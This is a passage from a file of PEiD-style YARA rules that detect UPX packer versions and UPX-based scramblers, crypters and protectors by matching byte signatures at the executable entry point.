01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_093_UnHack32_11: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 80 43 00 8D BE 00 90 FC FF C7 87 D0 64 04 00 26 81 74 8D 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_093_UnHack32_12: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 A0 43 00 8D BE 00 70 FC FF C7 87 D0 84 04 00 98 C1 DF 2D 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_v12_Marcus_Lazlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 05 A4 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 F2 31 C0 40 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 E6 31 C9 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x_2_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_v01_Borland_Delphi_HMX0101: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }\r\n        $b = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 34 50 45 00 ?? ?? ?? 00 FF FF 00 00 ?? 24 ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 40 00 00 C0 00 00 ?? ?? ?? ?? 00 00 ?? 00 00 00 ?? 1E ?? 00 ?? F7 ?? 00 A6 4E 43 00 ?? 56 ?? 00 AD D1 42 00 ?? F7 ?? 00 A1 D2 42 00 ?? 56 ?? 00 0B 4D 43 00 ?? F7 ?? 00 ?? F7 ?? 00 ?? 56 ?? 00 ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? 77 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 77 ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_Inliner_v10_by_GPcH: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }\r\n        $b = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 05 FF FF FF 85 C0 0F 84 06 03 00 00 89 85 C5 FE FF FF E8 00 00 00 00 5B B9 31 89 40 00 81 E9 2E 86 40 00 03 D9 50 53 E8 3D 02 00 00 61 03 BD A9 FE FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 09 FF FF FF FF B5 05 FF FF FF 56 57 FF 95 C5 FE FF FF 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB CE 68 00 80 00 00 6A 00 FF B5 C5 FE FF FF FF 95 09 FF FF FF 8D }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_070_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 EC 01 00 00 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Scrambler_by_GurueXe: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 C7 05 ?? ?? ?? ?? 75 07 E9 ?? FE FF FF 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_099_100_101_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE AE 00 00 00 8D BE 52 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_v072: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 ?? 60 BE 8D BE 57 83 CD }\r\n        $b = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 81 C6 B3 01 ?? ?? EB 0A ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_DLL_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_com_Hint_DOS_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 ?? ?? 50 8D ?? ?? ?? ?? ?? 57 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 83 ?? ?? 31 DB ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V290_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v124_Markus_Laszlo_overlay: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 EB 0B 90 8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 ?? ?? 11 DB 72 ?? B8 01 00 00 00 01 DB 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_SCRAMBLER_306: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXLock_v10_CyberDoom: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 60 E8 2B 03 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_v001_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_01_500mhz: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v124_Markus_Laszlo_overlay_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 EB 0B 90 8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 ?? ?? 11 DB 72 ?? B8 01 00 00 00 01 DB 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_UPX_06_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_01_500mhz_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x: PEiD\r\n{\r\n    strings:\r\n        $a = { EB EC ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n        $b = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v060_v061_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_06_snaker: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? B9 15 00 00 00 80 34 08 ?? E2 FA E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v081_v084_Modified_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_050_070_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_040_051_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 21 05 00 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_081_083_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8C C8 05 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 12 10 73 E7 92 AF AD 0E 0E 0E 06 1F 07 16 BD 00 00 BB 00 80 55 CB 55 50 58 21 0A 03 03 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_293_300_LZMA: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_pe_exe_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_293_LZMA_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v081_v084_Modified_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_DLL_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_092_101_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { 81 FC 00 00 77 02 CD 20 B9 00 00 BE 00 00 BF 00 00 BB 00 80 FD F3 A4 FC 87 F7 83 EE C6 19 ED 57 57 E9 00 00 55 50 58 21 0B 01 04 07 00 00 00 00 00 00 00 00 00 00 00 00 06 00 FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_V01_HMX0101_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_sibaway7yahoocom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_090_101_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8C C8 05 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 12 10 73 E7 92 AF AD 0E 0E 0E 06 1F 07 16 BD 00 00 BB 00 80 55 CB 55 50 58 21 0B 03 03 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Delphi_stub: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 ?? ?? ?? 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 }\r\n        $b = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF EB 0E ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v30_EXE_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 57 83 C3 04 53 68 ?? ?? ?? 00 56 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V290_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXcrypter_archphaseNWC_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BF ?? ?? ?? 00 81 FF ?? ?? ?? 00 74 10 81 2F ?? 00 00 00 83 C7 04 BB 05 ?? ?? 00 FF E3 BE ?? ?? ?? 00 FF E6 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070_Hint_DOS_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 ?? ?? 50 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_UPX_06_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v072_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 83 ?? ?? 31 DB 5E 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_UPX_0896_102_105_124_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_062_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 CB 55 50 58 21 07 00 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_7bit_Scrambler_102: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F 83 FA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_092_094_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE 2B 00 00 00 8D BE D5 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_081_084_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE D9 00 00 00 8D BE 27 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VisualUPX_02_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 C7 05 ?? ?? ?? 00 75 07 E9 ?? FE FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_MANtiCORE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Scrambler_RC_v1x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 C7 05 ?? ?? ?? ?? 75 07 E9 ?? FE FF FF 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_081_084_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 00 00 00 8D BE 00 00 00 FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v072: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 83 ?? ?? 31 DB 5E 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 83 CD FF 31 DB 5E 8D BE FA FF 57 66 81 87 81 C6 B3 01 EB 0A 8A 06 46 88 07 47 01 DB 75 }\r\n        $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 EC 01 ?? ?? 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v062_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 F0 01 ?? ?? 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXcrypter_archphaseNWC: PEiD\r\n{\r\n    strings:\r\n        $a = { BF ?? ?? ?? 00 81 FF ?? ?? ?? 00 74 10 81 2F ?? 00 00 00 83 C7 04 BB 05 ?? ?? 00 FF E3 BE ?? ?? ?? 00 FF E6 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_MANtiCORE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8A 14 08 80 F2 ?? 88 14 08 41 83 F9 ?? 75 F1 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_Modified: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VisualUPX_02_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 C7 05 ?? ?? ?? 00 75 07 E9 ?? FE FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V3X_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 